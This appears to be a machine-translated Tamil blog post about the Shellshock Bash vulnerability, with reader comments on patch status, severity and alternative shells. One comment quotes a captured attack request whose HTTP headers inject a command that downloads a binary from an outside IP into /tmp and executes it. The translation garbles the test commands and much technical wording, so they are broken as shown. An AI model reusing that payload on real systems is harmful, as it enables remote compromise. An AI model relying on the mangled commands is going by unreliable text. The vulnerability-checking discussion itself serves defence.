இது சில வலைப்பதிவுகளில் காட்டுத்தீ போல் இயங்குகிறது, இது வெளியிடப்பட்ட செய்தி பாதுகாப்பு வலைப்பதிவு de , Red Hat உலகளாவிய மாறிகள் தவறாகப் பயன்படுத்துவதால் பாஷில் காணப்படும் பாதிப்பு பற்றி. அசல் செய்தியின்படி:
“… பாதிப்புக்கு காரணம் பாஷ் ஷெல்லை அழைப்பதற்கு முன்பு சிறப்பாக வடிவமைக்கப்பட்ட மதிப்புகள் கொண்ட சுற்றுச்சூழல் மாறிகள் உருவாக்கப்படலாம். இந்த மாறிகள் ஷெல் செயல்படுத்தப்பட்டவுடன் செயல்படுத்தப்படும் குறியீட்டைக் கொண்டிருக்கலாம். இந்த விரிவான மாறிகளின் பெயர் ஒரு பொருட்டல்ல, அவற்றின் உள்ளடக்கங்கள் மட்டுமே. இதன் விளைவாக, இந்த பாதிப்பு பல சூழல்களில் வெளிப்படுகிறது, எடுத்துக்காட்டாக:
- ஃபோர்ஸ் கமாண்ட் தொலைநிலை பயனர்களுக்கு வரையறுக்கப்பட்ட கட்டளை செயல்படுத்தும் திறன்களை வழங்க இது sshd உள்ளமைவுகளில் பயன்படுத்தப்படுகிறது. அதைத் தவிர்ப்பதற்கும் தன்னிச்சையான கட்டளை செயலாக்கத்தை வழங்கவும் இந்த குறைபாடு பயன்படுத்தப்படலாம். சில கிட் மற்றும் சப்வர்ஷன் செயலாக்கங்கள் இத்தகைய தடைசெய்யப்பட்ட ஷெல்களைப் பயன்படுத்துகின்றன. பயனர்கள் ஏற்கனவே ஒரு கன்சோலுக்கான அணுகலைக் கொண்டிருப்பதால் OpenSSH இன் வழக்கமான பயன்பாடு பாதிக்கப்படாது.
- சிஜிஐ ஸ்கிரிப்ட்கள் பாஷ் அல்லது ஸ்பான் சப்லெவல்களில் எழுதப்பட்டிருந்தால் mod_cgi அல்லது mod_cgid ஐப் பயன்படுத்தும் அப்பாச்சி சேவையகம் பாதிக்கப்படும். PHP இல் ஒரு சிஸ்டம் / எக்ஸிக் ஷெல்லைப் பயன்படுத்தினால், C இல் உள்ள சிஸ்டம் / போப்பன், பைத்தானில் os.system / os.popen, போன்ற சப்லெவல்கள் மறைமுகமாகப் பயன்படுத்தப்படுகின்றன (சிஜிஐ பயன்முறையில் இயங்கும் போது), மற்றும் பெர்லில் திறந்த / அமைப்பு (இது கட்டளை சரத்தைப் பொறுத்தது).
- Mod_php உடன் இயங்கும் PHP ஸ்கிரிப்ட்கள் சப்லெவல்கள் இயக்கப்பட்டாலும் பாதிக்கப்படாது.
- தீங்கிழைக்கும் சேவையகத்திலிருந்து எடுக்கப்பட்ட மதிப்புகள் மூலம், கணினியை உள்ளமைக்க DHCP கிளையண்டுகள் ஷெல் ஸ்கிரிப்ட்களை அழைக்கின்றன. இது டிஹெச்சிபி கிளையன்ட் கணினியில் தன்னிச்சையான கட்டளைகளை வழக்கமாக ரூட்டாக செயல்படுத்த அனுமதிக்கும்.
- SUID சலுகைகளுடன் கூடிய பல்வேறு டீமன்கள் மற்றும் நிரல்கள் பயனரால் அமைக்கப்பட்ட / தாக்கப்பட்ட சூழல் மாறி மதிப்புகள் கொண்ட ஷெல் ஸ்கிரிப்ட்களை இயக்க முடியும், இது தன்னிச்சையான கட்டளைகளை செயல்படுத்த அனுமதிக்கும்.
- ஷெல்லுடன் இணையும் அல்லது ஷெல் ஸ்கிரிப்டை இயக்கும் வேறு எந்த பயன்பாடும் பாஷை ஒரு மொழிபெயர்ப்பாளராகப் பயன்படுத்துகிறது. நம்பத்தகுந்த உள்ளடக்கத்தை செயலாக்கி சேமித்து வைத்திருந்தாலும் கூட, மாறிகளை ஏற்றுமதி செய்யாத ஷெல் ஸ்கிரிப்ட்கள் இந்த சிக்கலுக்கு பாதிக்கப்படாது ஷெல் மாறிகள் (இடது) மற்றும் சப்லெவல்கள் திறக்கப்படுகின்றன.
… ”
எனது பாஷ் பாதிக்கப்பட்டுள்ளதா என்பதை எப்படி அறிவது?
இதைப் பொறுத்தவரை, இந்த பாதிப்பால் நாம் பாதிக்கப்பட்டுள்ளோமா என்பதை அறிய மிக எளிய வழி உள்ளது. உண்மையில், நான் என் ஆன்டெர்கோஸில் சோதித்தேன், வெளிப்படையாக எனக்கு எந்த பிரச்சனையும் இல்லை. நாம் செய்ய வேண்டியது ஒரு முனையத்தைத் திறந்து வைக்கவும்:
env x = '() {:;}; எதிரொலி பாதிக்கப்படக்கூடிய 'பாஷ்-சி "எதிரொலி இது ஒரு சோதனை"
இது இந்த வழியில் வந்தால் எங்களுக்கு எந்த பிரச்சனையும் இல்லை:
env x = '() {:;}; எதிரொலி பாதிக்கப்படக்கூடிய 'பாஷ்-சி "எதிரொலி இது ஒரு சோதனை" பாஷ்: எச்சரிக்கை: x: செயல்பாட்டு வரையறை முயற்சியை புறக்கணித்தல் பாஷ்: `x' க்கான செயல்பாட்டு வரையறையை இறக்குமதி செய்வதில் பிழை இது ஒரு சோதனை
முடிவு வேறுபட்டால், எங்கள் விருப்பமான விநியோகங்களின் புதுப்பிப்பு சேனல்களைப் பயன்படுத்த வேண்டும், அவை ஏற்கனவே பேட்சைப் பயன்படுத்தினதா என்பதைப் பார்க்கவும். எனவே உங்களுக்குத் தெரியும்
புதுப்பிக்கப்பட்டது: இது உபுண்டு 14:04 ஐப் பயன்படுத்தி ஒரு சக ஊழியரின் வெளியீடு:
env x = '() {:;}; எதிரொலி பாதிக்கப்படக்கூடிய 'பாஷ்-சி "எதிரொலி இது ஒரு சோதனை" பாதிக்கப்படக்கூடிய இது ஒரு சோதனை
நீங்கள் பார்க்கிறீர்கள், இதுவரை அது பாதிக்கப்படக்கூடியது.
எனக்கு 14.04 இலிருந்து குபுண்டு 64 உள்ளது, நானும் பெறுகிறேன்:
env x = '() {:;}; எதிரொலி பாதிக்கப்படக்கூடிய 'பாஷ்-சி "எதிரொலி இது ஒரு சோதனை"
பாதிக்கப்படக்கூடிய
இது ஒரு சோதனை
நான் ஏற்கனவே புதுப்பித்தேன், ஆனால் அது சரி செய்யவில்லை. என்ன செய்ய?
அவர்கள் புதுப்பிக்கக் காத்திருங்கள். ஏற்கனவே eOS எடுத்துக்காட்டாக புதுப்பிக்கப்பட்டது ..
எவ்வளவு வித்தியாசமானது, என்னிடம் குபுண்டு 14.04 உள்ளது
$ env x = '() {:;}; எதிரொலி பாதிக்கப்படக்கூடிய 'பாஷ்-சி "எதிரொலி இது ஒரு சோதனை"
bash: எச்சரிக்கை: x: செயல்பாட்டு வரையறை முயற்சியை புறக்கணித்தல்
பாஷ்: `x 'க்கான செயல்பாட்டு வரையறையை இறக்குமதி செய்வதில் பிழை
இது ஒரு சோதனை
இன்று பதிவிறக்கம் செய்யப்பட்ட "பாஷ்" தொகுப்பின் பதிப்பு:
4.3-7புண்டு 1.1
http://packages.ubuntu.com/trusty/bash
என் விஷயத்தில், கட்டளையை வழங்கினால், அது முனையத்தில் எனக்கு பின்வருவனவற்றைக் கொடுக்கிறது:
>எப்படியிருந்தாலும், நகைச்சுவை என்னவென்றால், நான் டெபியன் வீசியைப் புதுப்பித்தேன், அதுதான் என்னைத் தள்ளிவிட்டது.
பிழையின் இரண்டாம் பகுதிக்கு வீஸி இன்னும் பாதிக்கப்படக்கூடியது, குறைந்தபட்சம் பிற்பகலுக்கு (UTC -4: 30) சிக்கல் இன்னும் பின்பற்றப்பட்டு வந்தது: /
இன்று காலை ஒரு புதுப்பிப்பைப் பயன்படுத்துவதற்குப் பிறகு ஸ்லாக்வேர் அல்லது டெபியன் அல்லது சென்டோஸ் ஆகியவை தொடர்புடைய புதுப்பிப்பைப் பெற்றதால் அவை பாதிக்கப்படவில்லை என்பதை நான் சரிபார்த்தேன்.
இந்த நேரத்தில் உபுண்டு இன்னும் பாதிக்கப்படக்கூடியது எது? அது பாதுகாப்பானது என்று சொல்லுங்கள்: டி.
ஆனால் உபுண்டுவைப் புதுப்பிக்க முயற்சித்தீர்களா?
இன்றைய புதுப்பித்தலுடன் அவர்கள் அதை சரிசெய்துள்ளனர்.
OK
பாதுகாப்பு வல்லுநர்கள் 'பாஷ்' பாதிப்பு குறித்து எச்சரிக்கிறார்கள், இது ஹார்ட்லெட் பிழையை விட லினக்ஸ் மென்பொருள் பயனர்களுக்கு அதிக அச்சுறுத்தலை ஏற்படுத்தக்கூடும், அங்கு ஹேக்கர்கள் ஒரு கணினியின் முழுமையான கட்டுப்பாட்டை எடுக்க பாஷில் உள்ள ஒரு பிழையை பயன்படுத்த முடியும்.
சைபர் செக்யூரிட்டி நிறுவனமான ரேபிட் 7 இன் பொறியியல் மேலாளர் டோட் பியர்ட்ஸ்லி, குறைபாடு அதன் தீவிரத்தன்மைக்கு 10 என மதிப்பிடப்பட்டது, அதாவது இது அதிகபட்ச தாக்கத்தை ஏற்படுத்துகிறது, மேலும் சுரண்டலின் சிக்கலுக்கு "குறைந்த" என மதிப்பிடப்பட்டது, அதாவது 'ஹேக்கருக்கு' ஒப்பீட்டளவில் எளிதானது தாக்குதல்கள். இந்த பாதிப்பைப் பயன்படுத்துவதன் மூலம், தாக்குதல் செய்பவர்கள் இயக்க முறைமையைக் கட்டுப்படுத்தலாம், ரகசிய தகவல்களை அணுகலாம், மாற்றங்களைச் செய்யலாம். ”என்று பியர்ட்ஸ்லி கூறினார். "பாஷை ஆக்கிரமிக்கும் அமைப்புகள் உள்ள எவரும் உடனடியாக பேட்சைப் பயன்படுத்த வேண்டும்," என்று அவர் கூறினார்.
பாக் ஹோஸ்ட் செய்யப்பட்ட பழைய கருவியை (குனு) முன்வைக்கும் இந்த பாதிப்புக்கு முன், லினக்ஸ் மென்பொருளுக்கு குனுவிலிருந்து விடுபட்டு பி.எஸ்.டி கருவிக்கு மாற்றுவது மிகவும் வசதியாக இருக்கும்.
சோசலிஸ்ட் கட்சி: எனது கருத்து சுதந்திரத்தை தணிக்கை செய்யாதீர்கள், ... யாரையும் அவமதிக்க வேண்டாம், ... நான் நீக்கிய முந்தைய செய்தியைப் போல எனது செய்தியையும் நீக்க வேண்டாம்!.
ஓ, தயவுசெய்து அதை மிகைப்படுத்தாதீர்கள். பி.எஸ்.டி.யைப் பயன்படுத்துபவர்களை நான் எவ்வாறு வெறுக்கிறேன் மற்றும் இந்த திட்டங்களிலிருந்து குனு, லினக்ஸ் அல்லது எதையும் வெறுக்கிறேன்.
நான் உங்களுடன் இருக்கிறேன், இந்த துளையின் தீவிரத்தன்மை குறித்து நீங்கள் சொல்வது முற்றிலும் சரி.
இது தணிக்கை அல்ல, அது பணிநீக்கம் (ஜினோம் 3.14 இடுகையில் இதே கருத்தை நீங்கள் கூறியிருந்தீர்கள்)
«… மற்றும் சுரண்டலின் சிக்கலான தன்மை காரணமாக 'குறைந்த' என மதிப்பிடப்பட்டது, அதாவது ஹேக்கர் தாக்குதல்களுக்கு இது ஒப்பீட்டளவில் எளிதானது»
இணக்கமின்மை கவனிக்கத்தக்கதா?
பாதிப்பை சுரண்டுவது எப்படி எளிதானது மற்றும் அதே நேரத்தில் "குறைந்த" அபாயத்தைக் கொண்டிருப்பதால் அது பயன்படுத்த மிகவும் சிக்கலானது?
இது சந்தித்த சில மணி நேரங்களிலேயே தீர்க்கப்பட்ட ஒரு பிழை மற்றும் இதயமுள்ளவர்களைப் போல சுரண்டப்பட்டதாக எந்த அறிக்கையும் இல்லை (நிச்சயமாக, ஒருவருக்கொருவர் தெரிந்துகொள்ள இது குறைவான நேரம்).
இது உண்மையான ஆபத்தை விட அதிகமான பத்திரிகை பத்திரிகை.
St ஊழியர்கள் உங்களுக்கு முக்கியமில்லை என்று தோன்றுகிறதா? இப்போது நீங்கள் என்ன சொல்வீர்கள்?
GET./.HTTP/1.0
.பயனர் முகவர்:. நன்றி-ராப்
.குக்கி: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
. ஹோஸ்ட்: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.ரெஃபரர்: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
. ஏற்றுக்கொள்: * / *
$ கோப்பு nginx
nginx: குனு / லினக்ஸ் 32 க்கான நிலையான இணைக்கப்பட்ட ELF 80386-பிட் எல்.எஸ்.பி இயங்கக்கூடிய, இன்டெல் 1, பதிப்பு 2.6.18 (SYSV), அகற்றப்பட்டது
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
அது என்ன தெரியுமா? சிறிய ஆபத்தான எதுவும் இல்லை ...
நிலைமை மிகவும் தீவிரமானது, ஆனால் அங்கிருந்து நீங்கள் ஒரு பி.எஸ்.டி விருப்பத்திற்கு பாஷ் பயன்படுத்துவதை நிறுத்த வேண்டும் என்று சொல்வது, இது ஏற்கனவே நிறைய உள்ளது, எப்படியும் புதுப்பிப்பு ஏற்கனவே உள்ளது, நான் புதுப்பிப்பைத் தொடுகிறேன், வேறு ஒன்றும் இல்லை.
இப்போது பி.டி., இது ஒரு சக ஊழியர் என்று நான் நினைக்கிறேன், இங்கே நிர்வாகிகள் இதுபோன்ற கருத்துக்களை நீக்குவதற்கு தங்களை அர்ப்பணிக்கிறார்கள் என்று நான் நினைக்கவில்லை, ஏனென்றால் ஆம், ஏனென்றால், நான் இந்த சமூகத்தில் பங்கேற்றதிலிருந்து எனக்கு அந்த உணர்வு இருந்தது, நான் நம்புகிறேன் அப்படியே இருக்கும்.
வாழ்த்துக்கள்.
இரண்டு வெவ்வேறு இடுகைகளில் நீங்கள் அதே கருத்தை வைக்கிறீர்கள். கதையின் "மூலத்தை" விளம்பரப்படுத்த முயற்சிக்கிறீர்கள் என்றால், மன்னிக்கவும், இது இடம் அல்ல.
பாஷ் யூனிக்ஸ் (மற்றும் அதன் குனு குளோன்) இலிருந்து வருகிறது. OSX போன்ற BSD- அடிப்படையிலான அமைப்புகளும் பாதிக்கப்படுகின்றன, மேலும் ஜென்பெட்டாவின் கூற்றுப்படி, அவர்கள் அதை இன்னும் இணைக்கவில்லை. அதேபோல், பாஷை அணுக உங்களுக்கு உள்ளூர் அல்லது SSH வழியாக ஒரு பயனர் கணக்கு தேவை.
St பணியாளர்கள்:
1.- பிழையால் பாதிக்கப்படக்கூடிய சேவைகளின் அளவு காரணமாக இது நிலை 10 (அதிகபட்ச ஆபத்து நிலை) என வகைப்படுத்தப்பட்டுள்ளது. முக்கிய குறிப்பில் அவர்கள் அந்த உண்மையை மிகத் தெளிவுபடுத்துகிறார்கள், பிழை அப்பாச்சி, எஸ்.எஸ்.டி, சூட் அனுமதிகளுடன் கூடிய நிரல்கள் (xorg, மற்றவற்றுடன்) போன்ற சேவைகளை பாதிக்கும் என்று வாதிடுகின்றனர்.
2.- இது செயல்படுத்தப்படுவதற்கு வரும்போது இது குறைந்த அளவிலான சிரமம் என வகைப்படுத்தப்படுகிறது, மேலும் இதற்கு சிறந்த எடுத்துக்காட்டு எலாவ் இடுகையில் வைக்கப்பட்டுள்ள பாதிப்பு சோதனை ஸ்கிரிப்ட் ஆகும். நீங்கள் பார்க்க முடியும் என, செயல்படுத்த மிகவும் கடினம் அல்ல.
தகவல்களில் பணிநீக்கத்தை நான் காணவில்லை (நான் ஒரு Google மொழிபெயர்ப்பை மட்டுமே பார்க்கிறேன்) மற்றும் சிக்கல் மிகவும் தீவிரமாக இருந்தால், நீங்கள் சொல்வது போல், இது ஏற்கனவே ஒரு இணைப்பு மற்றும் தீர்வைக் கொண்டுள்ளது, ஆனால் அதற்காக அல்ல, அது இனி ஆபத்து அல்ல, மற்றும் மிகவும் உண்மையான ஒன்று.
etPetercheco / uk யுகிடெரு
என்னை தவறாகப் புரிந்து கொள்ளாதீர்கள், எனது விமர்சனம் ரோபட் இணைக்கிறது மற்றும் இணக்கமின்மையை மையமாகக் கொண்டது மற்றும் பணிநீக்கம் அல்ல என்பது தெளிவாகிறது என்று நான் நினைக்கிறேன்.
அதேபோல், ஆபத்து மற்றும் ஆபத்து ஆகியவற்றை நாம் வேறுபடுத்திப் பார்க்க வேண்டும் (பிந்தையதை நான் குறிப்பிடவில்லை), நாங்கள் பொதுவாக அவற்றை ஒத்த சொற்களாகப் பயன்படுத்துகிறோம், ஆனால் இங்கே, ஆபத்து என்பது பிழையின் சேதத் திறனாக இருக்கும், மேலும் அது நிகழும் நிகழ்தகவுக்கு ஆபத்தை ஏற்படுத்தும்.
எனது குறிப்பிட்ட விஷயத்தில், நான் நேற்று முதல் நுழைந்தேன். இது அஞ்சல் பட்டியல்களுக்காகவோ அல்லது அதுபோன்ற எதற்கோ அல்ல. இது ஒரு டெஸ்க்டாப் டிஸ்ட்ரோவுக்கு! நான் தொலைபேசியை எடுத்து, இணைப்புடன் சிசாட்மினுக்கு ஒரு செய்தியை அனுப்பினேன், எல்லாவற்றையும் தட்டச்சு செய்தேன் என்பதை உறுதிப்படுத்தினேன், பின்னர் என்னை மன்னியுங்கள், ஆனால் இந்த செய்தி என்னை தூங்க வைக்கவில்லை.
மற்ற மன்றங்களில் பாஷ் பாதிப்பு பற்றி அவர்கள் குறிப்பிடுகிறார்கள், "டெபியன் மற்றும் உபுண்டு வெளியிட்ட தீர்வு", ஆனால் இன்று அவர்கள் ஒரு பாதிப்பு இன்னும் இருப்பதைக் கண்டுபிடித்தனர், எனவே தீர்வு முழுமையடையாது, அவர்கள் அதைக் குறிப்பிடுகிறார்கள்!
பாதிப்பின் தீவிரத்திலிருந்தே மக்களைத் தடுக்கும் எளிய உண்மைக்காக பலர் என்னை விமர்சித்திருப்பதை நான் காண்கிறேன் - அதிகபட்ச ஆபத்தான நிலை 10 உடன் தகுதியுடையவர், மற்றும் பாஷ் ஹோஸ்ட் செய்யப்பட்ட காலாவதியான குனு கருவிக்கு முன் லினக்ஸ் மென்பொருளுக்கு சாத்தியமான தீர்வுகளை குறிப்பிடுவது - இது முற்றிலும் குனு முடியும் லினக்ஸ் மென்பொருளில் பி.எஸ்.டி கருவி மூலம் மாற்றப்பட வேண்டும்,… நான் லினக்ஸையும் பயன்படுத்துகிறேன், லினக்ஸையும் விரும்புகிறேன்!
பி.எஸ்.டி.யில் நிறுவப்பட்ட பாஷ் இயல்புநிலையாக வரவில்லை என்பதை நான் தெளிவுபடுத்துகிறேன், இது பி.எஸ்.டி.யில் நிறுவக்கூடிய மேலும் ஒரு லினக்ஸ் பொருந்தக்கூடிய தொகுப்பு ஆகும் ... ஆம்!. பல பயனர்கள் சில நேரங்களில் செய்தியை அல்லது கருத்தை நம்பாததால், அவர்கள் செய்திகளைச் சரிபார்க்கும் வகையில் ஆதாரம் வைக்கப்பட்டுள்ளது.
ரோபெட்: அவர்கள் ஏற்கனவே மீண்டும் மீண்டும் உங்களிடம் கூறியது போல, நீங்கள் ஏற்கனவே உங்கள் கருத்தை ஒரு இடுகையில் செய்திகளுடன் வைத்துள்ளீர்கள், நீங்கள் கருத்து தெரிவிக்கும் ஒவ்வொரு இடுகையிலும் அதை வைக்க வேண்டியதில்லை.
பாஷ் பற்றி, பாஷ் பாதிக்கப்படக்கூடிய நிலையில் பயன்படுத்தக்கூடிய பிற குண்டுகள் இருப்பதால். 😉
ரோபெட், என் அறிவுக்கு லினக்ஸ் கர்னலை பி.எஸ்.டி யூசர்லேண்டோடு இணைக்கும் எந்த மென்பொருளும் இல்லை. மிக நெருக்கமான விஷயம் என்னவென்றால், ஜென்டூ மற்றும் டெபியன் போன்ற kBSD + GNU. தவிர, குனு (1983) பி.எஸ்.டி (1977) க்குப் பிறகு இருந்தால் அதை "பழங்கால" என்று அழைக்க முடியாது. அவர்கள் இருவரும் தங்கள் யூனிக்ஸ் ரூட்டைப் பகிர்ந்து கொள்கிறார்கள் (ஆனால் குறியீடு அல்ல), லினஸ் டி இன்னும் குழந்தையாக இருந்தபோது பாஷ் உருவாக்கப்பட்டால் "லினக்ஸ் பொருந்தக்கூடிய தன்மை" இருக்காது.
uff, இந்த நேரத்தில் டெபியன் சோதனை என்பது "பாதிக்கப்படக்கூடியது" என்பது நம்மிடம் என்ன ஒரு ஸ்ட்ரீக் ...
நான் டெபியன் சோதனையைப் பயன்படுத்துகிறேன், இந்த கிளையில் கூட நாங்கள் பாஷ் புதுப்பிப்பைப் பெற்றுள்ளோம்
ஜென்பெட்டாவின் படி மற்றொரு பாதிப்பு உள்ளது
http://seclists.org/oss-sec/2014/q3/685
வினவலுக்கான கட்டளை
env X = '() {(a) => sh' sh -c "எதிரொலி பாதிக்கப்படக்கூடியது"; bash -c "எதிரொலி தோல்வி 2 இணைக்கப்படாதது"
env X = '() {(a) => sh' sh -c "எதிரொலி பாதிக்கப்படக்கூடியது"; bash -c "echo Unpatched Failure 2" sh: X: line 1: எதிர்பாராத உறுப்புக்கு அருகிலுள்ள தொடரியல் பிழை `= 'sh: X: line 1:`' sh: `X 'sh க்கான செயல்பாட்டு வரையறையை இறக்குமதி செய்வதில் பிழை: பாதிக்கப்படக்கூடிய: கட்டளை கிடைக்கவில்லை ஒட்டாமல் 2 தோல்விஅதே எனக்கு.
இங்கேயும் அதேதான். ஆனால் இடுகையின் அசல் பிழை (எல்) உபுண்டு 14.04 இல் இணைக்கப்பட்டது
ஒரு எளிய எதிரொலியைச் செய்வதற்குப் பதிலாக, சலுகைகள் தேவைப்படும் ஒரு அறிவுறுத்தலைச் செயல்படுத்த முயற்சிக்கிறேன், நான் "போதுமான சலுகைகளை" வீசுகிறேன் ... இந்த பிழை சலுகைகளை அதிகரிக்கவில்லையா?
நீ சொல்வது சரி!! அவை இரண்டு பாதிப்புகள் ...
நேற்றிரவு உபுண்டு களஞ்சியங்களில் அவர்கள் வைத்த இரண்டாவது பாஷ் புதுப்பித்தலுக்குப் பிறகு லினக்ஸ் புதினா 17 இல் எனக்கு, அந்த கட்டளையை செயல்படுத்தியவுடன் ஷெல் இந்த வெளியீட்டை வழங்குகிறது:
env X = '() {(a) => sh' sh -c "எதிரொலி பாதிக்கப்படக்கூடியது"; bash -c "எதிரொலி தோல்வி 2 இணைக்கப்படாதது"
>
முந்தையவற்றைப் புதுப்பிக்க உபுண்டு களஞ்சியங்களில் வைக்கப்பட்ட "பாஷ்" இன் பதிப்பு:
4.3-7புண்டு 1.2
டெபியன் பெறப்பட்ட கணினிகளில் இந்த கட்டளையுடன் நிறுவப்பட்ட பதிப்பை நீங்கள் சரிபார்க்கலாம்:
dpkg -s bash | grep பதிப்பு
எந்தவொரு சந்தர்ப்பத்திலும், குறைந்தபட்சம் டெபியன், உபுண்டு மற்றும் புதினா பயனர்களுக்கு இது தெளிவுபடுத்தப்பட வேண்டும்; #!
டெபியன் அல்கெமிஸ்ட் கன்சோல் (கோடு) என்பது பெறப்பட்ட போசிக்ஸ் கன்சோல் ஆகும்
சாம்பல்.
.
இது ஸ்கிரிப்ட்களை பாஷை விட வேகமாக இயக்கும் என்பதால், குறைவான சார்புகளைக் கொண்டுள்ளது
நூலகங்கள் (மென்பொருள் தோல்விகளுக்கு எதிராக இது மிகவும் வலுவானதாக அமைகிறது அல்லது
வன்பொருள்), இது கணினிகளில் இயல்புநிலை கணினி கன்சோலாகப் பயன்படுத்தப்படுகிறது
டெபியன்.
எனவே, குறைந்தபட்சம் உபுண்டுவில், பயனர் உள்நுழைவுக்கான ஷெல்லாக "பாஷ்" பயன்படுத்தப்படுகிறது (ரூட் பயனருக்கும்). ஆனால் எந்தவொரு பயனரும் பயனர் மற்றும் ரூட் கன்சோல்களுக்கு (டெர்மினல்கள்) முன்னிருப்பாக மற்றொரு ஷெல்லைப் பயன்படுத்தலாம்.
இந்த கட்டளைகளை இயக்குவதன் மூலம் ஷெல் ஸ்கிரிப்ட்களை (#! / பின் / ஷி) இயக்குகிறது என்பதை சரிபார்க்க எளிதானது:
கோப்பு / பின் / sh
(வெளியீடு / bin / sh: `dash 'க்கான குறியீட்டு இணைப்பு) கட்டளையை மீண்டும் செய்யும் சுவடுகளைப் பின்பற்றுகிறோம்
கோப்பு / பின் / கோடு
(வெளியீடு / பின் / கோடு: ELF 64-பிட் LSB பகிரப்பட்ட பொருள், x86-64, பதிப்பு 1 (SYSV) எனவே இது இயங்கக்கூடியது.
இவை லினக்ஸ் புதினா 17 விநியோகத்தின் முடிவுகள். உபுண்டு அல்லாத / டெபியன் அடிப்படையிலான விநியோகங்களில் அவை வேறுபட்டிருக்கலாம்.
இயல்புநிலை ஷெல்லை மாற்றுவது கடினம் அல்ல !! பயனர்களுக்கும் ரூட் பயனருக்கும் வேறு ஒன்றைப் பயன்படுத்தலாம். உண்மையில் நீங்கள் விரும்பும் ஷெல்லை நிறுவி இயல்புநிலையை "chsh" கட்டளையுடன் மாற்ற வேண்டும் அல்லது / etc / passwd கோப்பைத் திருத்துவதன் மூலம் ("passwd" கோப்பைத் திருத்தும் போது பிழையின் விளைவுகளைத் தெரியாத பயனர்கள், அவர்கள் தங்களை நன்றாகத் தெரிவிப்பது நல்லது, அதைத் திருத்துவதற்கு முன்பு, அதை மீட்டெடுப்பது அவசியமானால் அசலின் நகலை உருவாக்குங்கள்).
நான் "tcsh" உடன் மிகவும் வசதியாக உணர்கிறேன் (tcsh என்பது :)
TENEX C கன்சோல், பெர்க்லி csh இன் மேம்படுத்தப்பட்ட பதிப்பு
"Csh" என்பது மேக் ஓஎஸ் எக்ஸ் சில ஆண்டுகளுக்கு முன்பு பயன்படுத்தியது. ஆப்பிளின் இயக்க முறைமையின் பெரும்பகுதி ஃப்ரீ.பி.எஸ்.டி குறியீடு என்பதைக் கருத்தில் கொள்வது அர்த்தமுள்ளதாக இருக்கிறது. இப்போது நான் நேற்று படித்ததிலிருந்து, அவை பயனர் டெர்மினல்களுக்கும் "பாஷ்" ஐ வழங்குகின்றன என்று தெரிகிறது.
முடிவுரை:
- அதிகம் பயன்படுத்தப்பட்ட விநியோகங்களுக்கான "பாஷ்" பதிப்புகள் "ஏற்கனவே விநியோகிக்கப்பட்டுள்ளன
- "பாஷ்" பதிப்பு 4.3-7ubuntu1.2 மற்றும் பின்னர் இந்த பிழைகள் இல்லை
- OS * Linux இல் "bash" ஐப் பயன்படுத்துவது கட்டாயமில்லை
- சில * லினக்ஸ் விநியோகங்கள் இணைப்பு #! / பின் / sh உடன் "பாஷ்"
- மாற்று வழிகள் உள்ளன: சாம்பல், கோடு, csh, tcsh மற்றும் இன்னும் சில
- ஒரு முனையத்தைத் திறக்கும்போது கணினி அழைக்கும் இயல்புநிலை ஷெல்லை மாற்றுவது சிக்கலானது அல்ல
- சில சிறிய சாதனங்கள் (திசைவிகள் மற்றும் பிற) "பாஷ்" ஐப் பயன்படுத்துகின்றன, ஏனெனில் இது மிகப் பெரியது !!
இப்போது "பாஷ்" 4.3-7ubuntu1.3 இன் மற்றொரு பதிப்பை நிறுவும் மற்றொரு புதுப்பிப்பு வந்துவிட்டது
லினக்ஸ் புதினா 17 மற்றும் உபுண்டு 14.04.1 எல்.டி.எஸ்
ஆர்ச் லினக்ஸ் பதிப்பு பாஷ் -4.3.026-1 ஐ உள்ளிட்டது
@ சுர்க்சோ… .பெர்க்லியில் இருந்து சி.எஸ்.எஸ்? அந்த கருவி லினக்ஸ் மென்பொருளுக்கு சிறந்தது.
இது பிழை என்று நினைக்கிறேன்
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
உண்மையா?
அதற்கான தீர்வு என்ன?
உங்கள் டிஸ்ட்ரோவில் தொகுப்பைப் புதுப்பிக்க அவர்கள் காத்திருங்கள்
பிழை ஷெல்ஷாக் என ஞானஸ்நானம் பெற்றது
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
பாதிக்கப்படக்கூடிய
இது ஒரு சோதனை
உபுண்டு ஸ்டுடியோ 14.04 க்கு இன்னும் இணைப்பு இல்லை
உபுண்டு ஸ்டுடியோவில் பழுதுபார்க்கப்பட்டது 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; எதிரொலி பாதிக்கப்படக்கூடிய 'பாஷ்-சி "எதிரொலி இது ஒரு சோதனை"
bash: எச்சரிக்கை: x: செயல்பாட்டு வரையறை முயற்சியை புறக்கணித்தல்
பாஷ்: `x 'க்கான செயல்பாட்டு வரையறையை இறக்குமதி செய்வதில் பிழை
இது ஒரு சோதனை
உண்மையில் இது ஒரு சிறிய பாதிப்பு, அது உங்களைப் பாதித்தால், நீங்கள் முன்பு ஏதாவது தவறு செய்தீர்கள் என்பதுதான் ...
ஏனெனில் ரூட் சலுகைகளுடன் இயங்கும் பாஷ் ஸ்கிரிப்ட் ஒருபோதும் பயனருக்கு வெளிப்படுத்தப்படக்கூடாது. அவர் சலுகைகள் இல்லாமல் ஓடினால், அத்தகைய பாதிப்பு எதுவும் இல்லை. உண்மையில், இது வேடிக்கையானது. மிகவும் பயமுறுத்துகிறது.
நானும் அதையே நினைக்கிறேன்.
சரியாக, அதிகமான செய்தித்தாள்களை விற்க அல்லது அதிக வருகைகளைப் பெற, இந்த பிழைகள் நல்லது.
ஆனால் இந்த வகையான ஸ்கிரிப்டுகளுடன் ஒரு கணினியை சமரசம் செய்ய, நீங்கள் முதலில் பாஷை அணுக வேண்டும், பின்னர் அதை ரூட்டாக வைத்திருக்க வேண்டும் என்பதை அவர்கள் எப்போதும் குறிப்பிட மறந்து விடுகிறார்கள்.
